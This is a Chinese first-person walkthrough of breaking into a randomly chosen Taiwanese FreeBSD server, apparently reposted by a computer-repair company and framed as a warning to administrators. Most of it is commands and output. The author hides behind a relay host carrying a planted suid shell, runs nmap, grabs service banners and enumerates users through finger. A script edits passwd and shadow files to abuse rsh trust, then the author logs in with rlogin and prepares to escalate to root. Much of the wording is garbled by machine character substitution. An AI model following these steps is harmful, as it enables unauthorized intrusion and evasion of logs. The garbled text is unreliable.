我是怎么进入他人计算机的
本文的写作目标仅仅是为了给某些大意大意的网络办理职员一个警告——internet是有趣但非常脆弱的,当你的盘算机放在互联网上给人们提供信息与办事的同时,会引来网络中的“猎奇者”的窥探。而安全性与方便性是一对矛盾……在你对本身的网络做了一个安全计谋考量之后,你应该确定你愿意以多大的风险来利用一些方便的办事,当然这些办事——好比rlogin,可能只会使你少输入一次暗码……
首先是确定目标——撞大运乱挑一个吧,尝尝能不能乐成……呵,于是登上yahoo,上taiwan的站点小遛了一下……唔,这个还不错,我们姑且称其为www.targe.com……照旧先ping一下看看情势怎样——别碰上有墙的就逊了……
C:\>ping www.targe.com
Pinging www.targe.com [111.111.111.111] with 32 bytes of data:
Reply from 111.111.111.111: bytes=32 time=621ms TTL=241
Reply from 111.111.111.111: bytes=32 time=620ms TTL=241
Reply from 111.111.111.111: bytes=32 time=611ms TTL=241
Reply from 111.111.111.111: bytes=32 time=591ms TTL=241
速度照旧很快的嘛……那就开始吧……
先登上某台跳板台湾的呆板——如许安全一些,不会留下你本身的IP……(当然,说句题外话——如许要追查到还不是很困难,曾经有个朋侪同我说过,南边某大学一次被黑,种种迹象都评释黑客来自美国,IP、变动后主页上留下的话语……朋侪受托去补漏查源,发现那IP是美国一个提供免费shell的办事提供商……于是申请了一个shell,通过一系列行动成为root,检察系统日志——原形大白,IP居然指向那家大学自身)。
通过跳板还有一个利益——要是你的实验失败,在系统日志里留下来的是台湾外乡的IP,如许的登陆失败下令比力不会引起系统办理员的注意……
C:\>nc ***.***.***.*** 12345
就登上跳板了,12345端口里我预留了一个suid的shell……
好了,祭起宝刀——nmap……
# ./nmap -sT -O 111.111.111.111
Starting nmap V. 2.3BETA12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on www.targe.com (111.111.111.111):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
19 open tcp chargen
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
79 open tcp finger
80 open tcp http
111 open tcp sunrpc
443 open tcp https
512 open tcp exec
513 open tcp login
514 open tcp shell
515 open tcp printer
540 open tcp uucp
3306 open tcp mysql
TCP Sequence Prediction: Class=random positive increments
Difficulty=55346 (Worthy challenge)
No OS matches for host (If you know what OS is running on it
…………
…………
Nmap run completed -- 1 IP address (1 host up) scanned in 17 seconds
唔,运气还不错,提供的办事不少,预计漏也少不到哪儿去……只是没果断出系统
类型,这些办事里看上去可以利用的有:
Port State Protocol Service
21 open tcp ftp
25 open tcp smtp
79 open tcp finger
80 open tcp http
111 open tcp sunrpc
512 open tcp exec
513 open tcp login
514 open tcp shell
540 open tcp uucp
3306 open tcp mysql
最近rpc打击非常盛行,原因之一恐怕是方便易行——只需存在漏洞,长途就可以
得到一个rootshell……乃至对盘算机完全不懂的生手也能轻易实行,呵,那我们
来看看这个111 port的sunrpc里有什么奥妙吧……
# rpcinfo -p 111.111.111.111&
21404
# program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
咦,看来没戏唱哦……幸亏还有那么多办事,待偶逐步试来……
看看是什么FTP办事器软件吧,说不定有长途溢出的漏洞呢
# ./nc 111.111.111.111 21
#
乖乖龙的东,什么输出也没有就关上了,这是怎样一回事?
C:\>ftp 111.111.111.111
Connected to 111.111.111.111.
Connection closed by remote host.
呵呵,看来过滤掉了嘛……怎样办?看看25端口是运转什么SMTP办事的吧……
# ./nc 111.111.111.111 25
220 ***-***-***-*** ESMTP Sendmail 8.9.3/8.9.3; Wed, 5 Apr 2000 08:56:59 GMT
Sendmail 8.9.3/8.9.3?好象没有什么致命的漏洞呀……
看看是什么WEB办事器先……
# (echo "head /http/1.0";echo;echo)|./nc -w 3 111.111.111.111 80
Method Not Implemented
head to /http/1.0 not supported.
Invalid method in request head /http/1.0
--------------------------------------------------------------------------------
Apache/1.3.9 Server at ***-***-***-*** Port 80
阿帕奇这个版本的东东至少偶的印象中没有什么“去世穴”……
幸亏开了finger,俺就土土地先把用户列表弄出来吧……
finger O@www.targe.com
[www.targe.com]
root
aaa
bbb
ccc
ddd
总算有点收获……,那么下一步该做什么呢?既然这台主机开了512、513、514的r系列办事,那就值得实验一下,说不定哪个偷懒的家伙直接在.rhosts里设了+ username
那我就爽了……
随手写了个shell script,让它去一个一个地实验rsh下令,传到肉鸡上
# chmod 700 rsh.sh
# nohup ./rsh.sh www.targe.com
它会主动地在/etc/passwd和/etc/shadow里加上finger出来的用户名,然后su过去,再对长途目标111.111.111.111执行rsh下令,乐成则返回该用户名……然后将备份的passwd和shadow再拷归去……删除临时文件,天生报告文件……(或许是我对.rhosts的理解还有问题,偶然我在机里加上+ +但rcp时还会报Permission denied大概connectrefused,以是爽性都su成用户——或许太笨;)我便再去MUD里当我的大虾了……半个小时后回来,登上肉鸡,读取报告文件.rsh.txt
# cat ./.rsh.txt
ccc
hehe,非常抱歉,看来俺得到一个shell了……
出来看看……
# rlogin -l ccc 111.111.111.111
Last login: Fri Mar 24 19:04:50 from 202.102.2.147
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999
You have mail.
呵,原来是FreeBSD 3.2-RELEASE呀,觉得不错,出去了,看看我的权限怎样吧……
> id
id
uid=1003(ccc) gid=1003(ccc) groups=1003(ccc)
看来能做的事还相当有限噢……再看看系统里有没有他人先……
> w
w
9:03PM up 6 days, 2:37, 3 users, load averages: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
ccc p0 **.**.***.*** 6:04PM 2:41 -tcsh (tcsh)
不错,就我自在清闲……看看passwd吧……
> cat /etc/passwd
cat /etc/passwd
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
aaa:*:1005:2000::/home/www:/usr/local/bin/tcsh
bbb:*:1006:1006::/home/bbb:/usr/local/bin/tcsh
ccc:*:1003:1003::/home/ccc:/usr/local/bin/tcsh
ddd:*:1008:1008:ddd:/home/www:/usr/local/bin/tcsh
eee:*:1009:1009:eee:/home/eee:/usr/local/bin/tcsh
很明显/home/www便是www用户的主目次了……先看看俺ccc对该目次有没有写权限
> echo test >/home/www/test
test: Permission denied.
看来要是想改他的主页,还得别的想措施啦……不过都曾经有了一个用户shell了,最高权限实在也只有一步之遥啦,好吧,翻翻数据库里有什么关于FreeBSD 3.2的记载,看来工具不多呀……而且有些照旧安装外来软件包之后才带来的风险……
先看看有没有编译的权限再说吧,不然还得找一台BSD来编译……
> ls /usr/local/bin|grep gcc
gcc
一样平常环境下本身安装的gcc是会在这个目次的啦,不然最好find一下比力保险。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|